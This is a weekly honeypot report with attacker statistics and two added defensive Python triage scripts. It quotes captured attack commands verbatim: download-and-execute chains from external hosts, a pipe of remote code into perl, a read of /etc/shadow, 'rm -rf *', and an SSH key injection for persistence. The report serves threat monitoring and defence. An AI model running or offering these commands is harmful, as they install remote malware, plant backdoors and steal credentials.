Honey Pot – Previous week 29th November 2020

Compared to the last couple of weeks, the Honey Pot has seen an increased number of attacks across several areas: over 1000 additional attacking IPs, 500+ new login combinations and 260 new command-line requests.

Total attacking IPs: 2601
Total Countries: 82
Total User/pass successful combos: 2039
Total Commands ran: 1260
Total TCP Forward requests: 15777

TOP 30 Attacking IPs

The top attacking IP made an impressive 42,336 requests to the honey pot, roughly 7x the count of the IP in position 2. It is a DigitalOcean box in Amsterdam:

geoiplookup 188.166.89.44
GeoIP Country Edition: NL, Netherlands
GeoIP City Edition, Rev 1: NL, 07, Noord-Holland, Amsterdam, 1098, 52.352901, 4.941500, 0, 0
GeoIP ASNum Edition: AS14061 DigitalOcean, LLC

This is the same box that has dominated position number one for a few weeks now.

42336 188.166.89.44
6107 45.227.255.206
5819 45.227.255.162
5613 5.188.86.221
5488 5.188.86.168
5434 5.188.86.165
5287 5.188.86.169
5196 5.188.86.207
5083 5.188.86.210
5017 45.227.255.207
4988 5.188.86.178
4962 5.188.86.206
4855 5.188.86.216
4801 5.188.87.57
4689 5.188.86.167
4671 5.188.87.58
4617 5.188.87.53
4443 5.188.86.212
4432 5.188.87.49
4037 5.188.87.51
3942 5.188.87.60
3242 61.130.28.203
2472 45.227.255.161
1981 5.188.86.180
1498 185.232.67.36
1232 54.36.165.34
1164 5.182.39.63
1036 78.128.113.157
1016 5.182.39.64
888 5.157.16.74

Countries of Origin

It is no surprise that China is still in the number one position with 944 unique IP addresses, just over a third of the 2601 IPs hitting the server. The United States is the second-highest country. Compared to the previous weeks, the number of Chinese IPs has doubled.

944 China
401 United States
158 France
96 Singapore
96 Germany
82 India
76 Brazil
69 South Korea
67 Russia
46 Canada
45 Netherlands
44 United Kingdom
39 Indonesia
32 Hong Kong
30 Vietnam
27 Colombia
21 Poland
20 Ireland
17 Italy
17 Panama
16 Japan
15 Romania
15 Mexico
14 Argentina
14 Malaysia
11 Sweden
11 Thailand
10 Spain
9 Iran
8 Taiwan

Username and password combos

There is no real change in these statistics, with root/admin still accounting for by far the largest number of login attempts against the server.

112556 root/admin
217 root/1234
142 root/root
49 root/123456
46 root/test
41 root/music
36 root/password
34 root/1234567890
34 root/tequiero
31 root/123

TOP 30 Commands

A few new commands have shown up on the list of commands run. I attempted to view the source code of the .sh scripts they try to load onto the server; however, they were no longer online at the time of writing.

2063 uname -a;nproc
1496 uname -a
1213 cat /proc/cpuinfo | grep name | wc -l
1209 cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
1208 free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
1208 which ls
1208 ls -lh $(which ls)
1205 crontab -l
1204 w
1202 uname -m
1201 cat /proc/cpuinfo | grep model | grep name | wc -l
1200 uname
1200 top
1197 lscpu | grep Model
1188 cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
403 nproc
265 uname -s -v -n -r
177 echo -e "\x6F\x6B"
115 uname -a;php -v;
80 wget http://198.23.209.128/ytbins.sh; chmod 777 ytbins.sh; sh ytbins.sh; tftp 198.23.209.128 -c get yttftp1.sh; chmod 777 yttftp1.sh; sh yttftp1.sh; tftp -r yttftp2.sh -g 198.23.209.128; chmod 777 yttftp2.sh; sh yttftp2.sh; rm -rf ytbins.sh yttftp1.sh yttftp2.sh; rm -rf *
61 uname -a;id;cat /etc/shadow;chattr -ia /root/.ssh/*;wget http://tung-shu.cf/authorized_keys -O /root/.ssh/authorized_keys;wget -qO - http://tung-shu.cf/o|perl;wget http://tung-shu.cf/x -O /tmp/x;chmod +x /tmp/x;/tmp/x;rm -f /tmp/x
21 cat /etc/issue
13 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.14.224.77/pwnInfect.sh; curl -O http://45.14.224.77/pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp 45.14.224.77 -c get pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp -r pwnInfect2.sh -g 45.14.224.77; chmod 777 pwnInfect2.sh; sh pwnInfect2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.14.224.77 pwnInfect1.sh pwnInfect1.sh; sh pwnInfect1.sh; rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh; rm -rf *
9 echo "321" > /var/tmp/.var03522123
9 rm -rf /var/tmp/.var03522123
9 cd /tmp || cd /run || cd /; wget http://104.168.195.213/Heisenbergbins.sh; chmod 777 Heisenbergbins.sh; sh Heisenbergbins.sh; tftp 104.168.195.213 -c get Heisenbergtftp1.sh; chmod 777 Heisenbergtftp1.sh; sh Heisenbergtftp1.sh; tftp -r Heisenbergtftp2.sh -g 104.168.195.213; chmod 777 Heisenbergtftp2.sh; sh Heisenbergtftp2.sh; rm -rf Heisenbergbins.sh Heisenbergtftp1.sh Heisenbergtftp2.sh; rm -rf *
9 cat /var/tmp/.var03522123 | head -n 1
8 rm -rf Astra.x86; wget http://45.145.185.74/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 roots; rm -rf Astra.x86
8 rm -rf /var/tmp/dota
6 /bin/eyshcjdmzg
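The command list above mixes three things a defender wants to separate quickly: recon one-liners, download-and-execute chains (wget/curl/tftp/ftpget followed by chmod 777 and rm -rf *), and the authorized_keys injection that plants the "mdrfckr" key. The script below is an added example, not code from the report or from any honeypot project: it tags each recorded command by intent, pulls out the hosts and URLs to block, and decodes the injected OpenSSH public key to report its type, size, exponent and SHA256 fingerprint. The (count, command) record layout is assumed; the command strings are copied from the list above and the key is the one from the injection one-liner.

```python
"""Triage of honeypot command records (added example, not from the report).

Tags each recorded command with its apparent intent, extracts download
hosts/URLs for blocking, and parses any OpenSSH public key the attacker tries
to append to authorized_keys.  The (count, command) record layout is assumed.
"""
import base64
import hashlib
import re
import struct

# The key from the report's authorized_keys injection one-liner (verbatim).
MDRFCKR_KEY = (
    "ssh-rsa "
    "AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUan"
    "UV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9"
    "u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w"
    "6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAy"
    "SVKPRK+oRw== mdrfckr"
)

# Constructed sample records: commands copied from the report's Top-30 list.
SAMPLE_RECORDS = [
    (2063, "uname -a;nproc"),
    (1188, 'cd ~ && rm -rf .ssh && mkdir .ssh && echo "' + MDRFCKR_KEY
           + '">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~'),
    (80, "wget http://198.23.209.128/ytbins.sh; chmod 777 ytbins.sh; sh ytbins.sh; "
         "tftp 198.23.209.128 -c get yttftp1.sh; chmod 777 yttftp1.sh; sh yttftp1.sh; "
         "tftp -r yttftp2.sh -g 198.23.209.128; chmod 777 yttftp2.sh; sh yttftp2.sh; "
         "rm -rf ytbins.sh yttftp1.sh yttftp2.sh; rm -rf *"),
    (61, "uname -a;id;cat /etc/shadow;chattr -ia /root/.ssh/*;"
         "wget http://tung-shu.cf/authorized_keys -O /root/.ssh/authorized_keys;"
         "wget -qO - http://tung-shu.cf/o|perl;wget http://tung-shu.cf/x -O /tmp/x;"
         "chmod +x /tmp/x;/tmp/x;rm -f /tmp/x"),
]

URL_RE = re.compile(r'https?://[^\s;|"\']+')
# tftp <host> -c get <file>  or  tftp -r <file> -g <host>
TFTP_RE = re.compile(r"\btftp\s+(?:-r\s+\S+\s+-g\s+)?(\d{1,3}(?:\.\d{1,3}){3})")
# ftpget [opts] <host> <local> <remote>
FTPGET_RE = re.compile(r"\bftpget\b.*?\s(\d{1,3}(?:\.\d{1,3}){3})\s")
SSHKEY_RE = re.compile(r"(ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp\d+)\s+([A-Za-z0-9+/=]+)(?:\s+([^\s\"']+))?")
RECON_TOKENS = ("uname", "nproc", "lscpu", "/proc/cpuinfo", "free -m",
                "crontab -l", "cat /etc/issue", "php -v", "which ls")


def classify(cmd):
    """Return a set of intent tags for one recorded shell command."""
    tags = set()
    if any(tok in cmd for tok in RECON_TOKENS):
        tags.add("recon")
    if re.search(r"\b(wget|curl|tftp|ftpget)\b", cmd):
        tags.add("dropper")
    if re.search(r"\|\s*(sh|bash|perl|python)\b", cmd):
        tags.add("pipe_to_interpreter")
    if "authorized_keys" in cmd:
        tags.add("ssh_key_persistence")
    if "/etc/shadow" in cmd or "/etc/passwd" in cmd:
        tags.add("credential_theft")
    if "chattr" in cmd:
        tags.add("immutable_bit_tamper")
    if re.search(r"\brm -r?f\b", cmd):
        tags.add("file_removal")
    return tags


def extract_indicators(cmd):
    """Pull download URLs, contacted hosts and embedded SSH keys out of a command."""
    urls = URL_RE.findall(cmd)
    hosts = {u.split("/")[2] for u in urls}
    hosts.update(TFTP_RE.findall(cmd))
    hosts.update(FTPGET_RE.findall(cmd))
    keys = [m.group(0) for m in SSHKEY_RE.finditer(cmd)]
    return {"urls": urls, "hosts": sorted(hosts), "ssh_keys": keys}


def parse_ssh_pubkey(key_line):
    """Decode an OpenSSH public key line into type, size, exponent, comment, fingerprint."""
    m = SSHKEY_RE.search(key_line)
    if not m:
        raise ValueError("not an OpenSSH public key line")
    ktype, b64, comment = m.group(1), m.group(2), m.group(3)
    blob = base64.b64decode(b64)
    fields, off = [], 0
    while off < len(blob):          # RFC 4251 string fields: uint32 length + bytes
        (n,) = struct.unpack(">I", blob[off:off + 4])
        off += 4
        fields.append(blob[off:off + n])
        off += n
    if fields[0] != ktype.encode():
        raise ValueError("key type prefix does not match blob")
    digest = base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")
    info = {"type": ktype, "comment": comment, "bits": None, "e": None,
            "fingerprint": "SHA256:" + digest}
    if ktype == "ssh-rsa":          # fields: "ssh-rsa", e (mpint), n (mpint)
        info["e"] = int.from_bytes(fields[1], "big")
        info["bits"] = int.from_bytes(fields[2], "big").bit_length()
    elif ktype == "ssh-ed25519":
        info["bits"] = len(fields[1]) * 8
    return info


def triage(records):
    """Summarise (count, command) records: tags, hosts to block, injected keys."""
    out = []
    for count, cmd in records:
        ind = extract_indicators(cmd)
        out.append({"count": count, "tags": classify(cmd), "hosts": ind["hosts"],
                    "keys": [parse_ssh_pubkey(k) for k in ind["ssh_keys"]]})
    return out


if __name__ == "__main__":
    for row in triage(SAMPLE_RECORDS):
        print(row["count"], sorted(row["tags"]), row["hosts"])
        for k in row["keys"]:
            print("   injected key:", k["type"], k["bits"], "bits, e =", k["e"],
                  "comment =", k["comment"], k["fingerprint"])
```

The fingerprint and the unusual public exponent the parser reports for the mdrfckr key are what you would grep for across authorized_keys files on real hosts; the hosts list feeds an egress block list, and the tags let you drop pure recon noise when hunting through a week of records.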

TOP 30 TCP Forward Requests

ya.ru is still the main target of TCP forward requests. The requests for ya.ru come from the 5.188.86.0/24 network (the range that, together with 5.188.87.0/24, also fills most of the top-30 attacker list); this is the botnet I reported on previously from Ireland. The second-highest target is www.walmart.com.

85430 ya.ru:80
8908 www.walmart.com:443
6466 www.evernote.com:443
5655 oauth.vk.com:443
4809 www.amazon.com:443
3748 69.195.128.18:80
3738 api.sendspace.com:443
3423 www.google.com:443
3196 soundcloud.com:443
2560 96.43.128.70:80
2153 ip.bablosoft.com:80
1719 youtube.com:443
1583 34.107.165.220:443
1540 sso.verizonenterprise.com:443
1390 iforgot.apple.com:443
1326 151.101.65.35:443
1229 authserver.mojang.com:443
1227 151.101.129.35:443
1173 151.101.1.35:443
1146 omegle.com:80
1097 151.101.193.35:443
1072 api.ipify.org:443
1066 172.217.23.164:443
1036 vk.com:443
1016 work.a-poster.info:25000
1001 s.youtube.com:443
962 www.instagram.com:443
960 idmsa.apple.com:443
846 appleid.apple.com:443
762 aj-https.my.com:443
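Attributing forward requests to a source network, as the ya.ru observation above does, is a grouping problem: collapse each source IP to its /24 and count per destination. The following is an added example, not code from the report or from any honeypot project. The log lines are constructed in the shape of Cowrie-style JSON events (eventid "cowrie.direct-tcpip.request" with src_ip, dst_ip, dst_port); those field names are an assumption, so adjust them to whatever your sensor emits.

```python
"""Aggregate SSH direct-tcpip (port forward) requests by destination and source /24.

Added example, not from the report.  Event field names are assumed.
"""
import ipaddress
import json
from collections import Counter

FORWARD_EVENT = "cowrie.direct-tcpip.request"   # assumed event id

# Constructed sample log (JSON lines); IPs and targets taken from the report.
SAMPLE_LOG = """
{"eventid": "cowrie.direct-tcpip.request", "src_ip": "5.188.86.221", "dst_ip": "ya.ru", "dst_port": 80}
{"eventid": "cowrie.direct-tcpip.request", "src_ip": "5.188.86.168", "dst_ip": "ya.ru", "dst_port": 80}
{"eventid": "cowrie.direct-tcpip.request", "src_ip": "5.188.87.57", "dst_ip": "ya.ru", "dst_port": 80}
{"eventid": "cowrie.direct-tcpip.request", "src_ip": "45.227.255.206", "dst_ip": "www.walmart.com", "dst_port": 443}
{"eventid": "cowrie.direct-tcpip.request", "src_ip": "45.227.255.162", "dst_ip": "www.walmart.com", "dst_port": 443}
{"eventid": "cowrie.login.success", "src_ip": "5.188.86.221", "username": "root", "password": "admin"}
{"eventid": "cowrie.direct-tcpip.request", "src_ip": "5.188.86.165", "dst_ip": "ya.ru", "dst_port": 80}
"""


def parse_forwards(text):
    """Return [(src_ip, 'dst:port'), ...] from JSON-lines events, keeping only forwards."""
    out = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue                                  # tolerate a torn line
        if ev.get("eventid") != FORWARD_EVENT:
            continue                                  # logins, commands, etc. are not forwards
        out.append((ev["src_ip"], f'{ev["dst_ip"]}:{ev["dst_port"]}'))
    return out


def top_destinations(forwards, n=30):
    """Rank forward targets the way the report's TOP 30 table does."""
    return Counter(dst for _, dst in forwards).most_common(n)


def source_networks(forwards, dest, prefix=24):
    """Count which source /prefix networks drive the forwards to one destination."""
    nets = Counter()
    for src, dst in forwards:
        if dst == dest:
            net = ipaddress.ip_network(f"{src}/{prefix}", strict=False)
            nets[str(net)] += 1
    return nets


if __name__ == "__main__":
    fw = parse_forwards(SAMPLE_LOG)
    for dst, count in top_destinations(fw):
        print(count, dst, dict(source_networks(fw, dst)))
```

Run against a real week of events this reproduces the table above and, for any destination, tells you whether one botnet range is behind it. On a production SSH server the same abuse is shut off with AllowTcpForwarding no in sshd_config; on the honeypot it is left on deliberately so the destinations can be recorded.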